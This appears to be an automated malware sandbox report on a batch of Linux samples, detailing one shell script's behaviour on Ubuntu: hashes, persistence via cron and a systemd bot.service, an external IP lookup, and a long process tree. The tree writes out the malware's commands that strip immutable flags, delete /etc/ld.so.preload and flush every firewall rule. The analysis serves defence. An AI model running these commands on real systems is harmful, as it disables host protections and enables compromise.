Overview
overview
10Static
static
1script_mal...6c1.sh
ubuntu-20.04-amd64
9script_malware/1.sh
ubuntu-20.04-amd64
10script_mal...459.sh
ubuntu-20.04-amd64
7script_mal...ux.elf
ubuntu-20.04-amd64
1script_mal...da.elf
ubuntu-20.04-amd64
1script_malware/23.sh
ubuntu-20.04-amd64
10script_malware/404
ubuntu-20.04-amd64
script_mal...c5b.py
ubuntu-20.04-amd64
1script_mal...006.sh
ubuntu-20.04-amd64
10script_mal...oPy.sh
ubuntu-20.04-amd64
1script_mal...617.sh
ubuntu-20.04-amd64
script_mal...dc0.sh
ubuntu-20.04-amd64
9script_mal...e58.sh
ubuntu-20.04-amd64
7script_mal...d28.sh
ubuntu-20.04-amd64
7script_mal...ail.sh
ubuntu-20.04-amd64
script_malware/rs.sh
ubuntu-20.04-amd64
6script_mal...tup.sh
ubuntu-20.04-amd64
7script_mal...ll.elf
ubuntu-20.04-amd64
1script_malware/ta.sh
ubuntu-20.04-amd64
10Analysis
-
max time kernel
530s -
max time network
1805s -
platform
ubuntu-20.04_amd64 -
resource
ubuntu2004-amd64-20240221-en -
resource tags
arch:amd64arch:i386image:ubuntu2004-amd64-20240221-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system -
submitted
25-02-2024 14:29
Static task
static1
Behavioral task
behavioral1
Sample
script_malware/063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1.sh
Resource
ubuntu2004-amd64-20240221-en
Behavioral task
behavioral2
Sample
script_malware/1.sh
Resource
ubuntu2004-amd64-20240221-en
Behavioral task
behavioral3
Sample
script_malware/10c3b6b03a9bf105d264a8e7f30dcab0a6c59a414529b0af0a6bd9f1d2984459.sh
Resource
ubuntu2004-amd64-20240221-en
Behavioral task
behavioral4
Sample
script_malware/164f8295_linux.elf
Resource
ubuntu2004-amd64-20240221-en
Behavioral task
behavioral5
Sample
script_malware/21162bbd796ad2bf9954265276bfebea8741596e8fe9d86070245d9b5f9db6da.elf
Resource
ubuntu2004-amd64-20240221-en
Behavioral task
behavioral6
Sample
script_malware/23.sh
Resource
ubuntu2004-amd64-20240221-en
Behavioral task
behavioral7
Sample
script_malware/404
Resource
ubuntu2004-amd64-20240221-en
Behavioral task
behavioral8
Sample
script_malware/864d7bcd96f8cf35b9e372b6508bc6ef1a704eaaa03c34bd79577b057aebec5b.py
Resource
ubuntu2004-amd64-20240221-en
Behavioral task
behavioral9
Sample
script_malware/8e27b76b3903312cc5e93f250d7cf90b7b999592d70dcf2922bb450023014006.sh
Resource
ubuntu2004-amd64-20240221-en
Behavioral task
behavioral10
Sample
script_malware/SnOoPy.sh
Resource
ubuntu2004-amd64-20240221-en
Behavioral task
behavioral11
Sample
script_malware/a423a2a11c1904e42dc8630064e252ac4568220417a9ae072a557131e9386617.sh
Resource
ubuntu2004-amd64-20240221-en
Behavioral task
behavioral12
Sample
script_malware/a58fa03638110727f4a4a227f6ec2c0dceaeb39ccee89d12a4d727bb50d29dc0.sh
Resource
ubuntu2004-amd64-20240221-en
Behavioral task
behavioral13
Sample
script_malware/aa5a487db37ce176e17c7abbb2b1d460ba926344e46737f2f64b65bf5a4a3e58.sh
Resource
ubuntu2004-amd64-20240221-en
Behavioral task
behavioral14
Sample
script_malware/ae4b7284a9538c66432f02097c3de14e2253d16b6602c4694753468bc14d7d28.sh
Resource
ubuntu2004-amd64-20240221-en
Behavioral task
behavioral15
Sample
script_malware/redtail.sh
Resource
ubuntu2004-amd64-20240221-en
Behavioral task
behavioral16
Sample
script_malware/rs.sh
Resource
ubuntu2004-amd64-20240221-en
Behavioral task
behavioral17
Sample
script_malware/setup.sh
Resource
ubuntu2004-amd64-20240221-en
Behavioral task
behavioral18
Sample
script_malware/shell.elf
Resource
ubuntu2004-amd64-20240221-en
Behavioral task
behavioral19
Sample
script_malware/ta.sh
Resource
ubuntu2004-amd64-20240221-en
General
-
Target
script_malware/063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1.sh
-
Size
11KB
-
MD5
07b7746b922cf7d7fa821123a226ed36
-
SHA1
bf2df8f2813ef4e2cf61ea193e091b808aa854c7
-
SHA256
063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1
-
SHA512
ad29993a88c996f96fdc5c01fda89400b1e27228c58445d181dc6af974a171ee36e014d90aa8e09de6d83e4bfd12d167eb361bd52b6d194af6f249a6812019cb
-
SSDEEP
192:Xws08k5tkd5DFPSV3n7/e867jNKvSbRXA8kWmk4lkCIkvUgoaES8DSWOlA+1esP:XQwL4/e867USbRXA8kWT4yCtvUgDjdWi
Malware Config
Signatures
-
Modifies the dynamic linker configuration file 1 TTPs 1 IoCs
Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.
description ioc Process File opened for modification /etc/ld.so.preload 063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1.sh -
Flushes firewall rules 2 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
pid Process 1481 ufw 1679 iptables -
ioc pid Process /usr/lib/modules/5.4.0-169-generic/kernel/net/ipv6/netfilter/ip6_tables.ko 1491 modprobe -
Reads EFI boot settings 2 IoCs
Reads EFI boot settings from the efivars filesystem, may contain security secrets or sensitive data.
description ioc Process File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl -
Attempts to change immutable files 64 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
pid Process 1623 ip6tables 1816 xargs 1480 chattr 1591 ip6tables 1621 ip6tables 1624 ip6tables 1835 xargs 1519 iptables 1537 iptables 1587 ip6tables 1622 ip6tables 1818 xargs 1847 xargs 1504 iptables 1531 iptables 1874 xargs 1477 chattr 1502 iptables 1506 iptables 1507 iptables 1616 ip6tables 1806 xargs 1665 ip6tables 1670 ip6tables 1733 xargs 1810 xargs 1503 iptables 1536 iptables 1620 ip6tables 1479 chattr 1538 iptables 1571 iptables 1575 iptables 1505 iptables 1539 iptables 1592 ip6tables 1625 ip6tables 1814 xargs 1565 iptables 1657 ip6tables 1713 xargs 1489 ufw-init 1590 ip6tables 1540 iptables 1725 xargs 1552 iptables 1589 ip6tables 1619 ip6tables 1639 ip6tables 1695 xargs 1812 xargs 1534 iptables 1535 iptables 1604 ip6tables 1719 xargs 1508 iptables 1588 ip6tables 1593 ip6tables 1499 iptables 1584 ip6tables 1808 xargs 1830 xargs 1858 xargs 1869 xargs -
Creates/modifies Cron job 1 TTPs 50 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.LIiAfX crontab File opened for modification /var/spool/cron/crontabs/tmp.gyaUsu crontab File opened for modification /var/spool/cron/crontabs/tmp.eGBE5I crontab File opened for modification /var/spool/cron/crontabs/tmp.XlpQgl crontab File opened for modification /var/spool/cron/crontabs/tmp.YdUWHQ crontab File opened for modification /var/spool/cron/crontabs/tmp.i6jzNX crontab File opened for modification /var/spool/cron/crontabs/tmp.44vdXt crontab File opened for modification /var/spool/cron/crontabs/tmp.B0JoiS crontab File opened for modification /var/spool/cron/crontabs/tmp.bkrDuD crontab File opened for modification /var/spool/cron/crontabs/tmp.XgcwNE crontab File opened for modification /var/spool/cron/crontabs/tmp.uChNET crontab File opened for modification /var/spool/cron/crontabs/tmp.Fugycz crontab File opened for modification /var/spool/cron/crontabs/tmp.vwXgEw crontab File opened for modification /var/spool/cron/crontabs/tmp.rioI70 crontab File opened for modification /var/spool/cron/crontabs/tmp.T1CvWV crontab File opened for modification /var/spool/cron/crontabs/tmp.SXZmri crontab File opened for modification /var/spool/cron/crontabs/tmp.MyIusz crontab File opened for modification /var/spool/cron/crontabs/tmp.qpUpXy crontab File opened for modification /var/spool/cron/crontabs/tmp.mRi6zh crontab File opened for modification /var/spool/cron/crontabs/tmp.pWsVar crontab File opened for modification /var/spool/cron/crontabs/tmp.i5KOab crontab File opened for modification /var/spool/cron/crontabs/tmp.wwM8jf crontab File opened for modification /var/spool/cron/crontabs/tmp.O3tm8Z crontab File opened for modification /var/spool/cron/crontabs/tmp.wPW7PN crontab File opened for modification /var/spool/cron/crontabs/tmp.ifWDBe crontab File opened for modification /var/spool/cron/crontabs/tmp.LzAY23 crontab File opened for modification /var/spool/cron/crontabs/tmp.DpSIFa crontab File opened for modification /var/spool/cron/crontabs/tmp.XY5S22 crontab File opened for modification /var/spool/cron/crontabs/tmp.l7obdc crontab File opened for modification /var/spool/cron/crontabs/tmp.Gbpre3 crontab File opened for modification /var/spool/cron/crontabs/tmp.zaaBtc crontab File opened for modification /var/spool/cron/crontabs/tmp.OuaeaC crontab File opened for modification /var/spool/cron/crontabs/tmp.kWCF4d crontab File opened for modification /var/spool/cron/crontabs/tmp.XV0GGC crontab File opened for modification /var/spool/cron/crontabs/tmp.sEA7cO crontab File opened for modification /var/spool/cron/crontabs/tmp.4og9HI crontab File opened for modification /var/spool/cron/crontabs/tmp.cdApTG crontab File opened for modification /var/spool/cron/crontabs/tmp.6qeDC7 crontab File opened for modification /var/spool/cron/crontabs/tmp.eJ5MEd crontab File opened for modification /var/spool/cron/crontabs/tmp.35lNev crontab File opened for modification /var/spool/cron/crontabs/tmp.5Y2nOb crontab File opened for modification /var/spool/cron/crontabs/tmp.LzWSVP crontab File opened for modification /var/spool/cron/crontabs/tmp.DXakxk crontab File opened for modification /var/spool/cron/crontabs/tmp.3cXSrK crontab File opened for modification /var/spool/cron/crontabs/tmp.0Lelm1 crontab File opened for modification /var/spool/cron/crontabs/tmp.gSzIOc crontab File opened for modification /var/spool/cron/crontabs/tmp.D2cpEJ crontab File opened for modification /var/spool/cron/crontabs/tmp.sF7M1r crontab File opened for modification /var/spool/cron/crontabs/tmp.CIUgNm crontab File opened for modification /var/spool/cron/crontabs/tmp.LU51Fn crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 323 icanhazip.com 324 icanhazip.com -
Modifies systemd 1 TTPs 1 IoCs
Adds/ modifies systemd service files. Likely to achieve persistence.
description ioc Process File opened for modification /lib/systemd/system/bot.service 063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1.sh -
Reads CPU attributes 1 TTPs 44 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online pkill File opened for reading /sys/devices/system/cpu/online ps File opened for reading /sys/devices/system/cpu/online ps -
Enumerates kernel/hardware configuration 1 TTPs 4 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 systemctl File opened for reading /sys/module/ip6_tables/initstate modprobe File opened for reading /sys/module/x_tables/initstate modprobe -
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
description ioc Process File opened for reading /proc/1097/cmdline pkill File opened for reading /proc/805/status pkill File opened for reading /proc/673/cmdline pkill File opened for reading /proc/480/status ps File opened for reading /proc/814/cmdline ps File opened for reading /proc/172/cmdline pkill File opened for reading /proc/270/status pkill File opened for reading /proc/1297/cmdline pkill File opened for reading /proc/175/status pkill File opened for reading /proc/1432/cmdline pkill File opened for reading /proc/493/status pkill File opened for reading /proc/175/status pkill File opened for reading /proc/506/status pkill File opened for reading /proc/15/status pkill File opened for reading /proc/91/cmdline pkill File opened for reading /proc/457/status pkill File opened for reading /proc/270/stat ps File opened for reading /proc/1115/stat ps File opened for reading /proc/1188/cmdline pkill File opened for reading /proc/6/status pkill File opened for reading /proc/22/cmdline pkill File opened for reading /proc/400/status pkill File opened for reading /proc/1703/cmdline ps File opened for reading /proc/1094/cmdline ps File opened for reading /proc/1104/status pkill File opened for reading /proc/906/stat ps File opened for reading /proc/1171/status pkill File opened for reading /proc/161/status pkill File opened for reading /proc/965/status pkill File opened for reading /proc/8/status ps File opened for reading /proc/1320/status pkill File opened for reading /proc/678/status pkill File opened for reading /proc/200/status pkill File opened for reading /proc/1062/status pkill File opened for reading /proc/75/status pkill File opened for reading /proc/201/status pkill File opened for reading /proc/170/status pkill File opened for reading /proc/242/status pkill File opened for reading /proc/443/stat ps File opened for reading /proc/1145/stat ps File opened for reading /proc/1097/status pkill File opened for reading /proc/1138/cmdline pkill File opened for reading /proc/18/cmdline pkill File opened for reading /proc/678/status pkill File opened for reading /proc/172/cmdline pkill File opened for reading /proc/200/cmdline pkill File opened for reading /proc/164/cmdline pkill File opened for reading /proc/506/stat ps File opened for reading /proc/1088/stat ps File opened for reading /proc/164/stat ps File opened for reading /proc/1088/status ps File opened for reading /proc/7/cmdline pkill File opened for reading /proc/1409/cmdline pkill File opened for reading /proc/639/cmdline pkill File opened for reading /proc/1418/cmdline pkill File opened for reading /proc/917/status pkill File opened for reading /proc/272/stat ps File opened for reading /proc/1297/cmdline ps File opened for reading /proc/1320/cmdline pkill File opened for reading /proc/158/cmdline ps File opened for reading /proc/1428/stat ps File opened for reading /proc/454/cmdline pkill File opened for reading /proc/21/status pkill File opened for reading /proc/169/cmdline pkill
Processes
-
/tmp/script_malware/063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1.sh/tmp/script_malware/063ccf736c2c19ca5db70b8d8a7cf00377899c16023c63fee836bdefadd336c1.sh1⤵
- Modifies the dynamic linker configuration file
- Modifies systemd
PID:1476 -
/usr/bin/chattrchattr -i /etc/ld.so.preload2⤵
- Attempts to change immutable files
PID:1477
-
-
/usr/bin/rmrm -f /etc/ld.so.preload2⤵PID:1478
-
-
/usr/bin/chattrchattr -R -i /var/spool/cron2⤵
- Attempts to change immutable files
PID:1479
-
-
/usr/bin/chattrchattr -i /etc/crontab2⤵
- Attempts to change immutable files
PID:1480
-
-
/usr/sbin/ufwufw disable2⤵
- Flushes firewall rules
PID:1481 -
/usr/sbin/iptables/usr/sbin/iptables -V3⤵PID:1488
-
-
/lib/ufw/ufw-init/lib/ufw/ufw-init force-stop3⤵
- Attempts to change immutable files
PID:1489 -
/sbin/ip6tablesip6tables -L INPUT -n4⤵PID:1490
-
/sbin/modprobe/sbin/modprobe ip6_tables5⤵
- Loads a kernel module
- Enumerates kernel/hardware configuration
PID:1491
-
-
-
/sbin/iptablesiptables -F ufw-logging-deny4⤵PID:1493
-
-
/sbin/iptablesiptables -F ufw-logging-allow4⤵PID:1497
-
-
/sbin/iptablesiptables -F ufw-not-local4⤵PID:1498
-
-
/sbin/iptablesiptables -F ufw-user-logging-input4⤵
- Attempts to change immutable files
PID:1499
-
-
/sbin/iptablesiptables -F ufw-user-limit-accept4⤵PID:1500
-
-
/sbin/iptablesiptables -F ufw-user-limit4⤵PID:1501
-
-
/sbin/iptablesiptables -F ufw-skip-to-policy-input4⤵
- Attempts to change immutable files
PID:1502
-
-
/sbin/iptablesiptables -F ufw-reject-input4⤵
- Attempts to change immutable files
PID:1503
-
-
/sbin/iptablesiptables -F ufw-after-logging-input4⤵
- Attempts to change immutable files
PID:1504
-
-
/sbin/iptablesiptables -F ufw-after-input4⤵
- Attempts to change immutable files
PID:1505
-
-
/sbin/iptablesiptables -F ufw-user-input4⤵
- Attempts to change immutable files
PID:1506
-
-
/sbin/iptablesiptables -F ufw-before-input4⤵
- Attempts to change immutable files
PID:1507
-
-
/sbin/iptablesiptables -F ufw-before-logging-input4⤵
- Attempts to change immutable files
PID:1508
-
-
/sbin/iptablesiptables -F ufw-skip-to-policy-forward4⤵PID:1509
-
-
/sbin/iptablesiptables -F ufw-reject-forward4⤵PID:1510
-
-
/sbin/iptablesiptables -F ufw-after-logging-forward4⤵PID:1511
-
-
/sbin/iptablesiptables -F ufw-after-forward4⤵PID:1512
-
-
/sbin/iptablesiptables -F ufw-user-logging-forward4⤵PID:1513
-
-
/sbin/iptablesiptables -F ufw-user-forward4⤵PID:1514
-
-
/sbin/iptablesiptables -F ufw-before-forward4⤵PID:1515
-
-
/sbin/iptablesiptables -F ufw-before-logging-forward4⤵PID:1516
-
-
/sbin/iptablesiptables -F ufw-track-forward4⤵PID:1517
-
-
/sbin/iptablesiptables -F ufw-track-output4⤵PID:1518
-
-
/sbin/iptablesiptables -F ufw-track-input4⤵
- Attempts to change immutable files
PID:1519
-
-
/sbin/iptablesiptables -F ufw-skip-to-policy-output4⤵PID:1520
-
-
/sbin/iptablesiptables -F ufw-reject-output4⤵PID:1521
-
-
/sbin/iptablesiptables -F ufw-after-logging-output4⤵PID:1522
-
-
/sbin/iptablesiptables -F ufw-after-output4⤵PID:1523
-
-
/sbin/iptablesiptables -F ufw-user-logging-output4⤵PID:1524
-
-
/sbin/iptablesiptables -F ufw-user-output4⤵PID:1525
-
-
/sbin/iptablesiptables -F ufw-before-output4⤵PID:1526
-
-
/sbin/iptablesiptables -F ufw-before-logging-output4⤵PID:1527
-
-
/sbin/iptablesiptables -Z ufw-logging-deny4⤵PID:1528
-
-
/sbin/iptablesiptables -Z ufw-logging-allow4⤵PID:1529
-
-
/sbin/iptablesiptables -Z ufw-not-local4⤵PID:1530
-
-
/sbin/iptablesiptables -Z ufw-user-logging-input4⤵
- Attempts to change immutable files
PID:1531
-
-
/sbin/iptablesiptables -Z ufw-user-limit-accept4⤵PID:1532
-
-
/sbin/iptablesiptables -Z ufw-user-limit4⤵PID:1533
-
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-input4⤵
- Attempts to change immutable files
PID:1534
-
-
/sbin/iptablesiptables -Z ufw-reject-input4⤵
- Attempts to change immutable files
PID:1535
-
-
/sbin/iptablesiptables -Z ufw-after-logging-input4⤵
- Attempts to change immutable files
PID:1536
-
-
/sbin/iptablesiptables -Z ufw-after-input4⤵
- Attempts to change immutable files
PID:1537
-
-
/sbin/iptablesiptables -Z ufw-user-input4⤵
- Attempts to change immutable files
PID:1538
-
-
/sbin/iptablesiptables -Z ufw-before-input4⤵
- Attempts to change immutable files
PID:1539
-
-
/sbin/iptablesiptables -Z ufw-before-logging-input4⤵
- Attempts to change immutable files
PID:1540
-
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-forward4⤵PID:1541
-
-
/sbin/iptablesiptables -Z ufw-reject-forward4⤵PID:1542
-
-
/sbin/iptablesiptables -Z ufw-after-logging-forward4⤵PID:1543
-
-
/sbin/iptablesiptables -Z ufw-after-forward4⤵PID:1544
-
-
/sbin/iptablesiptables -Z ufw-user-logging-forward4⤵PID:1545
-
-
/sbin/iptablesiptables -Z ufw-user-forward4⤵PID:1546
-
-
/sbin/iptablesiptables -Z ufw-before-forward4⤵PID:1547
-
-
/sbin/iptablesiptables -Z ufw-before-logging-forward4⤵PID:1548
-
-
/sbin/iptablesiptables -Z ufw-track-forward4⤵PID:1549
-
-
/sbin/iptablesiptables -Z ufw-track-output4⤵PID:1550
-
-
/sbin/iptablesiptables -Z ufw-track-input4⤵
- Attempts to change immutable files
PID:1552
-
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-output4⤵PID:1553
-
-
/sbin/iptablesiptables -Z ufw-reject-output4⤵PID:1554
-
-
/sbin/iptablesiptables -Z ufw-after-logging-output4⤵PID:1555
-
-
/sbin/iptablesiptables -Z ufw-after-output4⤵PID:1557
-
-
/sbin/iptablesiptables -Z ufw-user-logging-output4⤵PID:1558
-
-
/sbin/iptablesiptables -Z ufw-user-output4⤵PID:1559
-
-
/sbin/iptablesiptables -Z ufw-before-output4⤵PID:1560
-
-
/sbin/iptablesiptables -Z ufw-before-logging-output4⤵PID:1561
-
-
/sbin/iptablesiptables -X ufw-logging-deny4⤵PID:1562
-
-
/sbin/iptablesiptables -X ufw-logging-allow4⤵PID:1563
-
-
/sbin/iptablesiptables -X ufw-not-local4⤵PID:1564
-
-
/sbin/iptablesiptables -X ufw-user-logging-input4⤵
- Attempts to change immutable files
PID:1565
-
-
/sbin/iptablesiptables -X ufw-user-logging-output4⤵PID:1566
-
-
/sbin/iptablesiptables -X ufw-user-logging-forward4⤵PID:1567
-
-
/sbin/iptablesiptables -X ufw-user-limit-accept4⤵PID:1568
-
-
/sbin/iptablesiptables -X ufw-user-limit4⤵PID:1569
-
-
/sbin/iptablesiptables -X ufw-user-input4⤵
- Attempts to change immutable files
PID:1571
-
-
/sbin/iptablesiptables -X ufw-user-forward4⤵PID:1573
-
-
/sbin/iptablesiptables -X ufw-user-output4⤵PID:1574
-
-
/sbin/iptablesiptables -X ufw-skip-to-policy-input4⤵
- Attempts to change immutable files
PID:1575
-
-
/sbin/iptablesiptables -X ufw-skip-to-policy-output4⤵PID:1576
-
-
/sbin/iptablesiptables -X ufw-skip-to-policy-forward4⤵PID:1577
-
-
/sbin/iptablesiptables -P INPUT ACCEPT4⤵PID:1578
-
-
/sbin/iptablesiptables -P OUTPUT ACCEPT4⤵PID:1579
-
-
/sbin/iptablesiptables -P FORWARD ACCEPT4⤵PID:1580
-
-
/sbin/ip6tablesip6tables -F ufw6-logging-deny4⤵PID:1581
-
-
/sbin/ip6tablesip6tables -F ufw6-logging-allow4⤵PID:1582
-
-
/sbin/ip6tablesip6tables -F ufw6-not-local4⤵PID:1583
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-input4⤵
- Attempts to change immutable files
PID:1584
-
-
/sbin/ip6tablesip6tables -F ufw6-user-limit-accept4⤵PID:1585
-
-
/sbin/ip6tablesip6tables -F ufw6-user-limit4⤵PID:1586
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-input4⤵
- Attempts to change immutable files
PID:1587
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-input4⤵
- Attempts to change immutable files
PID:1588
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-input4⤵
- Attempts to change immutable files
PID:1589
-
-
/sbin/ip6tablesip6tables -F ufw6-after-input4⤵
- Attempts to change immutable files
PID:1590
-
-
/sbin/ip6tablesip6tables -F ufw6-user-input4⤵
- Attempts to change immutable files
PID:1591
-
-
/sbin/ip6tablesip6tables -F ufw6-before-input4⤵
- Attempts to change immutable files
PID:1592
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-input4⤵
- Attempts to change immutable files
PID:1593
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-forward4⤵PID:1594
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-forward4⤵PID:1595
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-forward4⤵PID:1596
-
-
/sbin/ip6tablesip6tables -F ufw6-after-forward4⤵PID:1597
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-forward4⤵PID:1598
-
-
/sbin/ip6tablesip6tables -F ufw6-user-forward4⤵PID:1599
-
-
/sbin/ip6tablesip6tables -F ufw6-before-forward4⤵PID:1600
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-forward4⤵PID:1601
-
-
/sbin/ip6tablesip6tables -F ufw6-track-forward4⤵PID:1602
-
-
/sbin/ip6tablesip6tables -F ufw6-track-output4⤵PID:1603
-
-
/sbin/ip6tablesip6tables -F ufw6-track-input4⤵
- Attempts to change immutable files
PID:1604
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-output4⤵PID:1605
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-output4⤵PID:1606
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-output4⤵PID:1607
-
-
/sbin/ip6tablesip6tables -F ufw6-after-output4⤵PID:1608
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-output4⤵PID:1609
-
-
/sbin/ip6tablesip6tables -F ufw6-user-output4⤵PID:1610
-
-
/sbin/ip6tablesip6tables -F ufw6-before-output4⤵PID:1611
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-output4⤵PID:1612
-
-
/sbin/ip6tablesip6tables -Z ufw6-logging-deny4⤵PID:1613
-
-
/sbin/ip6tablesip6tables -Z ufw6-logging-allow4⤵PID:1614
-
-
/sbin/ip6tablesip6tables -Z ufw6-not-local4⤵PID:1615
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-input4⤵
- Attempts to change immutable files
PID:1616
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-limit-accept4⤵PID:1617
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-limit4⤵PID:1618
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-input4⤵
- Attempts to change immutable files
PID:1619
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-input4⤵
- Attempts to change immutable files
PID:1620
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-input4⤵
- Attempts to change immutable files
PID:1621
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-input4⤵
- Attempts to change immutable files
PID:1622
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-input4⤵
- Attempts to change immutable files
PID:1623
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-input4⤵
- Attempts to change immutable files
PID:1624
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-input4⤵
- Attempts to change immutable files
PID:1625
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-forward4⤵PID:1626
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-forward4⤵PID:1627
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-forward4⤵PID:1628
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-forward4⤵PID:1629
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-forward4⤵PID:1630
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-forward4⤵PID:1631
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-forward4⤵PID:1633
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-forward4⤵PID:1635
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-forward4⤵PID:1636
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-output4⤵PID:1638
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-input4⤵
- Attempts to change immutable files
PID:1639
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-output4⤵PID:1641
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-output4⤵PID:1642
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-output4⤵PID:1644
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-output4⤵PID:1645
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-output4⤵PID:1647
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-output4⤵PID:1648
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-output4⤵PID:1650
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-output4⤵PID:1651
-
-
/sbin/ip6tablesip6tables -X ufw6-logging-deny4⤵PID:1653
-
-
/sbin/ip6tablesip6tables -X ufw6-logging-allow4⤵PID:1654
-
-
/sbin/ip6tablesip6tables -X ufw6-not-local4⤵PID:1655
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-input4⤵
- Attempts to change immutable files
PID:1657
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-output4⤵PID:1659
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-forward4⤵PID:1660
-
-
/sbin/ip6tablesip6tables -X ufw6-user-limit-accept4⤵PID:1662
-
-
/sbin/ip6tablesip6tables -X ufw6-user-limit4⤵PID:1664
-
-
/sbin/ip6tablesip6tables -X ufw6-user-input4⤵
- Attempts to change immutable files
PID:1665
-
-
/sbin/ip6tablesip6tables -X ufw6-user-forward4⤵PID:1667
-
-
/sbin/ip6tablesip6tables -X ufw6-user-output4⤵PID:1668
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-input4⤵
- Attempts to change immutable files
